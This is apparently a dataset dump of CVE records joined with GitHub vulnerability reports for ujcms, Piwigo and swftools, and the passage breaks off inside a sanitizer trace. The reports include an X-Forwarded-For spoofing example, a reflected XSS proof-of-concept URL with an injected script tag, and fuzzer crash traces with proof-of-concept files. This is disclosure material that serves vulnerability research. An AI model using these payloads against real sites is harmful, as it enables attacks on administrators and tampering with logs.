cve_id
stringlengths
13
16
cve_published
stringlengths
23
23
cve_descriptions
stringlengths
54
1.07k
cve_metrics
dict
cve_references
listlengths
1
34
cve_configurations
listlengths
1
5
url
stringlengths
39
77
cve_tags
sequencelengths
1
4
domain
stringclasses
1 value
issue_owner_repo
sequencelengths
2
2
issue_body
stringlengths
3
88.6k
issue_title
stringlengths
3
335
issue_comments_url
stringlengths
58
81
issue_comments_count
int64
0
146
issue_created_at
stringlengths
20
20
issue_updated_at
stringlengths
20
20
issue_html_url
stringlengths
39
62
issue_github_id
int64
128M
2.09B
issue_number
int64
1
122k
CVE-2023-51350
2024-01-11T23:15:08.570
A spoofing attack in ujcms v.8.0.2 allows a remote attacker to obtain sensitive information and execute arbitrary code via a crafted script to the X-Forwarded-For function in the header.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Product" ], "url": "https://github.com/ujcms/ujcms" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ujcms/ujcms/issues/7" }, { "source": "[email protected]", "tags": [ "Product" ], "url": "https://www.ujcms.com/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ujcms:ujcms:8.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "E0B2489F-50F7-45FE-BC2E-9AA8E6309ADD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ujcms/ujcms/issues/7
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ujcms", "ujcms" ]
[Vulnerability description] Ujcms v8.0.2 has a vulnerability that is Reliance on IP Address for Authentication(CWE-291), attacker could spoofing servers with IP addresses and impact log record. [Vulnerability Type] CWE-291: Reliance on IP Address for Authentication [Vendor of Product] https://gitee.com/ujcms/ujcms https://github.com/ujcms/ujcms https://www.ujcms.com/ [Affected Product Code Base] v8.0.2 [Vulnerability proof] Condition: tomcat deployment project the weak java file : src/main/java/com/ujcms/commons/web/Servlets.java 1. The method to get a real client IP by X-Forwarded-For ![image](https://github.com/ujcms/ujcms/assets/152193131/59c55a9d-d33d-425f-802e-83a34e1ecb35) 2. If attacker add a `X-Forwarded-For: 1.1.1.1` in header, the IP list will be `1.1.1.1, 127.0.0.1`, now `getRemoteAddr()` will get the `127.0.0.1` ![image](https://github.com/ujcms/ujcms/assets/152193131/b922aeb1-19f9-4c73-a0e1-8a7e7b93822f) ![image](https://github.com/ujcms/ujcms/assets/152193131/560cf23a-ce23-4c53-a10c-af5cad249252) 3. And then find the ip from right to left, the left ip is 1.1.1.1 ![image](https://github.com/ujcms/ujcms/assets/152193131/94c6d2a3-af4b-43a8-b814-6225b6f4c854) The IP impersonation is complete We can see the fake IP address in the log. ![image](https://github.com/ujcms/ujcms/assets/152193131/42d152dd-9cea-42e0-9de8-96eae73cf36e) many Controllers use this weak method: ![image](https://github.com/ujcms/ujcms/assets/152193131/6b529006-7d76-465d-80c1-01f9ab85b2fa)
Ujcms v8.0.2 has a vulnerability that attacker could spoofing servers with IP addresses.
https://api.github.com/repos/dromara/ujcms/issues/7/comments
0
2023-12-17T10:20:56Z
2023-12-18T08:23:31Z
https://github.com/dromara/ujcms/issues/7
2,045,160,053
7
CVE-2023-51790
2024-01-12T13:15:11.733
Cross Site Scripting vulnerability in piwigo v.14.0.0 allows a remote attacker to obtain sensitive information via the lang parameter in the Admin Tools plug-in component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/Piwigo/AdminTools/issues/21" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/2069" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:14.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "DF997677-CC8C-40D2-BAA6-EF1374DC731F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Piwigo/Piwigo/issues/2069
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
### **Summary** A reflected cross-site scripting (XSS) vulnerability has been discovered in the "ato_lang" parameter. This vulnerability can be exploited by an attacker to inject malicious HTML and JS code into the HTML page, which could then be executed by webmaster or administrators when they visit the URL with the payload. Since The lang parameter exists on every page, which results in a malicious lang value (session-level persistence XSS) attached to any page that administrator visits before the session ends. ### **Details** The vulnerability is caused by the insecure injection of the "ato_lang" value from the URL into the HTML page. An attacker can exploit this vulnerability by crafting a malicious URL that contains a specially crafted "ato_lang" value. When a victim who is logged in as an webmaster or administrator visits this URL, the malicious code will be injected into the HTML page and executed. Attackers can construct malicious lang values in PHP files that accept ato_lang in lang parameters at any time. Basically, all pages presented to administrator will have (ato_)lang values. This means that the payload that occurs is not fixed. ### **Vulnerability recurrence requirements** The webmaster opens the Admin Tools plug-in The webmaster or administrators opens the link for the malicious ato_lang value ### **Proof of Concept (POC)** Open the "Admin Tools" plugin ![image](https://github.com/Hebing123/cve/assets/66168888/22f033b4-1e29-4608-a776-85c19fcec681) Access a PHP file that can accept the value of the lang parameter. http://192.168.160.147/index.php?ato_lang=zh_TW%3C/script%3E%3Cscript%3Ealert(9017)%3C/script%3E&mobile=false& ![image](https://github.com/Hebing123/cve/assets/66168888/6c4805a0-5996-4337-8f79-3c6f7f66f292) Access other web pages, such as the profile.php. ![image](https://github.com/Hebing123/cve/assets/66168888/b73832c3-6425-454f-b34f-d0abd399d097) Giving a malicious value of $ato.MULTIVIEW.lang can lead to reflective XSS vulnerabilities. The lang parameter exists on every page, which results in a malicious lang value (session-level persistence XSS) attached to any page that a webmaster or administrator visits before the session ends. **Because the security team did not respond within 72 hours, I made the report public.**
piwigo v14.0.0 has a reflected XSS vulnerability
https://api.github.com/repos/Piwigo/AdminTools/issues/21/comments
0
2023-12-18T04:03:44Z
2024-06-06T09:48:54Z
https://github.com/Piwigo/AdminTools/issues/21
2,054,769,328
21
CVE-2023-51806
2024-01-12T13:15:11.807
File Upload vulnerability in Ujcms v.8.0.2 allows a local attacker to execute arbitrary code via a crafted file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Product" ], "url": "https://github.com/ujcms/ujcms" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ujcms/ujcms/issues/8" }, { "source": "[email protected]", "tags": [ "Product" ], "url": "https://www.ujcms.com/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ujcms:ujcms:8.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "E0B2489F-50F7-45FE-BC2E-9AA8E6309ADD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ujcms/ujcms/issues/8
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ujcms", "ujcms" ]
[Vulnerability description] Ujcms v8.0.2 has a vulnerability that upload a pdf file with hidden Cross Site Scripting (XSS). [Vulnerability Type] CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [Vendor of Product] https://gitee.com/ujcms/ujcms https://github.com/ujcms/ujcms https://www.ujcms.com/ [Affected Product Code Base] v8.0.2 [Vulnerability proof] Condition: tomcat deployment project 1. we could upload this poc. ![image](https://github.com/ujcms/ujcms/assets/152193131/c44bd5ef-c648-4771-9a95-38cebec973e3) 2. click view in edge. ![image](https://github.com/ujcms/ujcms/assets/152193131/d0d62495-a2c9-4868-aca0-e12e87eb59fd) [Repair suggestion] 1. We should filter the PDF file uploaded by the user to ensure that it does not contain malicious scripts and other content.
Ujcms v8.0.2 has a vulnerability that upload a pdf file with hidden Cross Site Scripting (XSS).
https://api.github.com/repos/dromara/ujcms/issues/8/comments
0
2023-12-18T09:31:31Z
2023-12-18T09:31:31Z
https://github.com/dromara/ujcms/issues/8
2,046,165,973
8
CVE-2024-22562
2024-01-19T15:15:09.463
swftools 0.9.2 was discovered to contain a Stack Buffer Underflow via the function dict_foreach_keyvalue at swftools/lib/q.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/210" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/210
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
# project https://github.com/matthiaskramm/swftools version:0.9.2 # os info Ubuntu18.04 TLS # poc [poc.zip](https://github.com/matthiaskramm/swftools/files/13785772/poc.zip) # build git clone https://github.com/matthiaskramm/swftools.git cd swftools ./configure --disable-shared && make /swftools/src/swfc ./poc # ASAN info ==1974919==ERROR: AddressSanitizer: stack-buffer-underflow on address 0x7fff7c700200 at pc 0x0000006f49fe bp 0x7fff7c7001a0 sp 0x7fff7c700198 READ of size 8 at 0x7fff7c700200 thread T0 #0 0x6f49fd in dict_foreach_keyvalue /home/ubuntu/fuzz/swftools/swftools/lib/q.c #1 0x6f49fd in map_dump /home/ubuntu/fuzz/swftools/swftools/lib/q.c:1479:5 #2 0x4ed460 in lu /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:2831:2 #3 0x4ed460 in analyseArgumentsForCommand /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:4514:24 #4 0x4ed460 in findFontUsage /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:4558:13 #5 0x4ee184 in firstPass /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:4571:5 #6 0x4ee184 in main /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:4590:5 #7 0x7f0be0316082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #8 0x41d63d in _start (/home/ubuntu/fuzz/swftools/swftools/src/swfc+0x41d63d) Address 0x7fff7c700200 is located in stack of thread T0 at offset 0 in frame #0 0x4ecf6f in findFontUsage /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:4550 This frame has 1 object(s): [32, 40) 'args.i' (line 4496) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-underflow /home/ubuntu/fuzz/swftools/swftools/lib/q.c in dict_foreach_keyvalue Shadow bytes around the buggy address: 0x10006f8d7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006f8d8000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006f8d8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006f8d8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006f8d8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10006f8d8040:[f1]f1 f1 f1 00 f3 f3 f3 00 00 00 00 00 00 00 00 0x10006f8d8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006f8d8060: 00 00 00 00 f1 f1 f1 f1 f8 f2 f2 f2 f8 f3 f3 f3 0x10006f8d8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006f8d8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006f8d8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1974919==ABORTING
stack-buffer-underflow exists in the function dict_foreach_keyvalue in swftools/lib/q.c
https://api.github.com/repos/swftools/swftools/issues/210/comments
0
2023-12-28T11:52:17Z
2024-01-10T03:23:59Z
https://github.com/swftools/swftools/issues/210
2,058,345,861
210
CVE-2024-22920
2024-01-19T15:15:09.560
swftools 0.9.2 was discovered to contain a heap-use-after-free via the function bufferWriteData in swftools/lib/action/compile.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/211" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/211
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
# project https://github.com/matthiaskramm/swftools version 0.9.2 # os info Ubuntu18.04 TLS # poc [poc.zip](https://github.com/matthiaskramm/swftools/files/13786202/poc.zip) # build git clone https://github.com/matthiaskramm/swftools.git cd swftools ./configure --disable-shared && make ./swftools/src/swfc ./poc # ASAN Info ================================================================= ==1800620==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000019c0 at pc 0x000000611de5 bp 0x7ffc021e2080 sp 0x7ffc021e2078 READ of size 1 at 0x60c0000019c0 thread T0 #0 0x611de4 in bufferWriteData /home/ubuntu/fuzz/swftools/swftools/lib/action/compile.c:223:20 #1 0x6120ff in bufferWriteBuffer /home/ubuntu/fuzz/swftools/swftools/lib/action/compile.c:234:10 #2 0x6293ec in swf4parse /home/ubuntu/fuzz/swftools/swftools/lib/swf4compiler.y:946:7 #3 0x59d4e8 in compileSWFActionCode /home/ubuntu/fuzz/swftools/swftools/lib/action/actioncompiler.c:83:6 #4 0x5275f8 in swf_ActionCompile /home/ubuntu/fuzz/swftools/swftools/lib/modules/swfaction.c:1111:11 #5 0x4e12af in s_action /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:1966:13 #6 0x4fec01 in c_action /home/ubuntu/fuzz/swftools/swftools/src/swfc.c #7 0x4ee709 in parseArgumentsForCommand /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:4475:5 #8 0x4ee709 in main /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:4598:2 #9 0x7ffa7c1e1082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #10 0x41d63d in _start (/home/ubuntu/fuzz/swftools/swftools/src/swfc+0x41d63d) 0x60c0000019c0 is located 0 bytes inside of 128-byte region [0x60c0000019c0,0x60c000001a40) freed by thread T0 here: #0 0x4979c9 in realloc (/home/ubuntu/fuzz/swftools/swftools/src/swfc+0x4979c9) #1 0x611e64 in bufferCheckSize /home/ubuntu/fuzz/swftools/swftools/lib/action/compile.c:195:43 #2 0x611e64 in bufferWriteData /home/ubuntu/fuzz/swftools/swftools/lib/action/compile.c:220:2 previously allocated by thread T0 here: #0 0x4976ad in malloc (/home/ubuntu/fuzz/swftools/swftools/src/swfc+0x4976ad) #1 0x611839 in newBuffer /home/ubuntu/fuzz/swftools/swftools/lib/action/compile.c:164:23 #2 0x59d4e8 in compileSWFActionCode /home/ubuntu/fuzz/swftools/swftools/lib/action/actioncompiler.c:83:6 #3 0x5275f8 in swf_ActionCompile /home/ubuntu/fuzz/swftools/swftools/lib/modules/swfaction.c:1111:11 #4 0x4e12af in s_action /home/ubuntu/fuzz/swftools/swftools/src/swfc.c:1966:13 #5 0x7ffa7c1e1082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-use-after-free /home/ubuntu/fuzz/swftools/swftools/lib/action/compile.c:223:20 in bufferWriteData Shadow bytes around the buggy address: 0x0c187fff82e0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x0c187fff82f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c187fff8300: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c187fff8310: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa 0x0c187fff8320: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd =>0x0c187fff8330: fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd 0x0c187fff8340: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa 0x0c187fff8350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c187fff8360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c187fff8370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c187fff8380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1800620==ABORTING
heap-use-after-free exists in the function bufferWriteData in swftools/lib/action/compile.c:223
https://api.github.com/repos/swftools/swftools/issues/211/comments
0
2023-12-28T12:06:28Z
2024-01-10T03:23:28Z
https://github.com/swftools/swftools/issues/211
2,058,359,151
211
CVE-2024-22911
2024-01-19T18:15:08.680
A stack-buffer-underflow vulnerability was found in SWFTools v0.9.2, in the function parseExpression at src/swfc.c:2602.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/216" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/216
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
# Summary A stack-buffer-overflow caused when using swfc. # Version ``` $ ./swfc -V swfc - part of swftools 0.9.2 $ git log --oneline -1 772e55a2 (HEAD, origin/master, origin/HEAD, master) ``` # Platform ``` $ uname -a Linux 1cc373898f58 5.4.0-150-generic #167~18.04.1-Ubuntu SMP Wed May 24 00:51:42 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux clang version : 12.0.0 ``` # Reproduce PoC : [poc.zip](https://github.com/matthiaskramm/swftools/files/13898222/poc.zip) Command Line : `./swfc poc` # Debug Info ``` ==59251==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffd234 at pc 0x000000513ecb bp 0x7fffffffcd90 sp 0x7fffffffcd88 READ of size 4 at 0x7fffffffd234 thread T0 #0 0x513eca in parseExpression /src/project/swftools_project/swftools/src/swfc.c:2602:37 #1 0x513eca in parseTwip /src/project/swftools_project/swftools/src/swfc.c:2634:19 #2 0x5438d5 in texture2 /src/project/swftools_project/swftools/src/swfc.c:3061:9 #3 0x529b5c in c_gradient /src/project/swftools_project/swftools/src/swfc.c:3097:5 #4 0x51b3ad in parseArgumentsForCommand /src/project/swftools_project/swftools/src/swfc.c:4475:5 #5 0x51b3ad in main /src/project/swftools_project/swftools/src/swfc.c:4598:2 #6 0x7ffff7c39082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) #7 0x41d61d in _start (/src/project/swftools_project/swftools/src/swfc+0x41d61d) Address 0x7fffffffd234 is located in stack of thread T0 at offset 1172 in frame #0 0x51105f in parseTwip /src/project/swftools_project/swftools/src/swfc.c:2632 This frame has 3 object(s): [32, 1056) 'chr2index.i' (line 2528) [1184, 2208) 'stack.i' (line 2539) <== Memory access at offset 1172 underflows this variable [2336, 4384) 'values.i' (line 2540) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /src/project/swftools_project/swftools/src/swfc.c:2602:37 in parseExpression Shadow bytes around the buggy address: 0x10007fff79f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7a30: 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 =>0x10007fff7a40: f2 f2 f2 f2 f2 f2[f2]f2 00 00 00 00 00 00 00 00 0x10007fff7a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff7a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==59251==ABORTING ```
stack-buffer-overflow exit in parseExpression at src/swfc.c:2602
https://api.github.com/repos/swftools/swftools/issues/216/comments
0
2024-01-10T13:04:05Z
2024-01-11T06:44:59Z
https://github.com/swftools/swftools/issues/216
2,074,336,039
216
CVE-2024-22912
2024-01-19T18:15:08.723
A global-buffer-overflow was found in SWFTools v0.9.2, in the function countline at swf5compiler.flex:327. It allows an attacker to cause code execution.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/212" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6149BA0-2082-45B7-9B43-CAC2F1768770", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/212
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
# Summary A global-buffer-overflow caused when using swfc. # Version ``` $ ./swfc -V swfc - part of swftools 0.9.2 $ git log --oneline -1 772e55a2 (HEAD, origin/master, origin/HEAD, master) ``` # Platform ``` $ uname -a Linux 1cc373898f58 5.4.0-150-generic #167~18.04.1-Ubuntu SMP Wed May 24 00:51:42 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux clang version : 12.0.0 ``` # Reproduce PoC : [poc.zip](https://github.com/matthiaskramm/swftools/files/13887307/poc.zip) Command Line: ``` $ ./swfc poc ``` # Debug Info ``` ==47121==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000014986cd at pc 0x0000007c1de5 bp 0x7fffffffc250 sp 0x7fffffffc248 WRITE of size 1 at 0x0000014986cd thread T0 #0 0x7c1de4 in countline /src/project/swftools_project/swftools/lib/swf5compiler.flex:327:21 #1 0x7c1de4 in swf5lex /src/project/swftools_project/swftools/lib/swf5compiler.flex:305:6 #2 0x7f48c6 in swf5parse /src/project/swftools_project/swftools/lib/swf5compiler.tab.c:3061:16 #3 0x68383d in compileSWFActionCode /src/project/swftools_project/swftools/lib/action/actioncompiler.c:90:6 #4 0x593963 in swf_ActionCompile /src/project/swftools_project/swftools/lib/modules/swfaction.c:1111:11 #5 0x50114e in s_action /src/project/swftools_project/swftools/src/swfc.c:1966:13 #6 0x5451f0 in c_action /src/project/swftools_project/swftools/src/swfc.c #7 0x51da0c in parseArgumentsForCommand /src/project/swftools_project/swftools/src/swfc.c:4475:5 #8 0x51da0c in main /src/project/swftools_project/swftools/src/swfc.c:4598:2 #9 0x7ffff7c39082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) #10 0x41d61d in _start (/Sleuth_code/project_src/PoC/project/swftools_project/swftools/fuzz_issue-209/swfc_cov+0x41d61d) 0x0000014986cd is located 51 bytes to the left of global variable 'current_filename' defined in 'as3/files.c:56:7' (0x1498700) of size 8 0x0000014986cd is located 9 bytes to the right of global variable 'current_column' defined in 'as3/files.c:55:5' (0x14986c0) of size 4 SUMMARY: AddressSanitizer: global-buffer-overflow /src/project/swftools_project/swftools/lib/swf5compiler.flex:327:21 in countline Shadow bytes around the buggy address: 0x00008028b080: 00 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 